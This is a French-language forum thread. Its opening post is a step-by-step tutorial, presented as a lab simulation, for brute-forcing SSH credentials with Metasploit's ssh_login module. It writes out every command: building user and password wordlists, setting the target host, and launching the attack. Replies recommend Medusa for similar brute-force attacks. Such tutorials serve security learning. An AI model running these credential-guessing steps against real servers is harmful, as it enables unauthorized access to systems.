Vous n'êtes pas identifié(e).
== Description ==
En parcourant un aute forum j'ai découvert une option que je n'avais pas encore testée avec metasploit c'est le bruteforce, donc j'ai décidé de tester et faire un petit tuto simulé, je n'ai pas le temps de faire un bruteforce avec un dictionnaire de 10 Gio, donc a vous de développer le tuto.
== Configuration ==
Dans un premier temps nous allons créer 2 dictionnaires, l'un contenant les login et le second les password, dans mon exemple je met direct le login et le bon passe, ça ira plus vite, n'oubliez pas que ceci est une simulation et en aucun cas une véritable attaque.
echo root > Users
echo toor > Passwords
== Utilisation ==
Maintenant que les dictionnaires sont en place passons à l'attaque, commençons par lancer msfconsole.
msfconsole
Ensuite on sélectionne l'outil qui servira à l'attaque.
use auxiliary/scanner/ssh/ssh_login
On lui désigne le dictionnaire contenant les login.
set user_file /root/Users
Celui contenant les mot de passes.
set pass_file /root/Passwords
On configure l'IP de la cible.
set rhosts 192.168.1.12
Et on configure l'arret automatique de l'attaque une fois que l'opération s'est déroulée avec succès.
set stop_on_success true
Plus qu'a lancer l'attaque
run
== Résultat ==
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Medusa est aussi un bon outil pour pouvoir attaquer par bruteforce. ^^
Cet outil permet d'entrer un ID que nous connaissons ou non. Ou non car si l'ID est inconnu de l'attaquant, l'outil va générer des combinaisons similaires au "patron" que nous lui auront fourni. Une fonction qui est bien utile.
En plus de ça, il permet d'attaquer sur un port choisit, ainsi qu'un protocole choisit, mais pas tous, normal. (SNMP, SSH, Telnet, FTP, etc...)
Et pour finir, choisir un chemin vers son dico préféré (plus ou moins complet, tout dépend des infos obtenues lors de la post-exploit)
C'est un autre sujet, si tu veux tu peux ouvrir un topic pour poster un tuto sur medusa.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
C'est fait ^^ Je t'invite à le consulter : http://linuxtrack.net/viewtopic.php?id=1095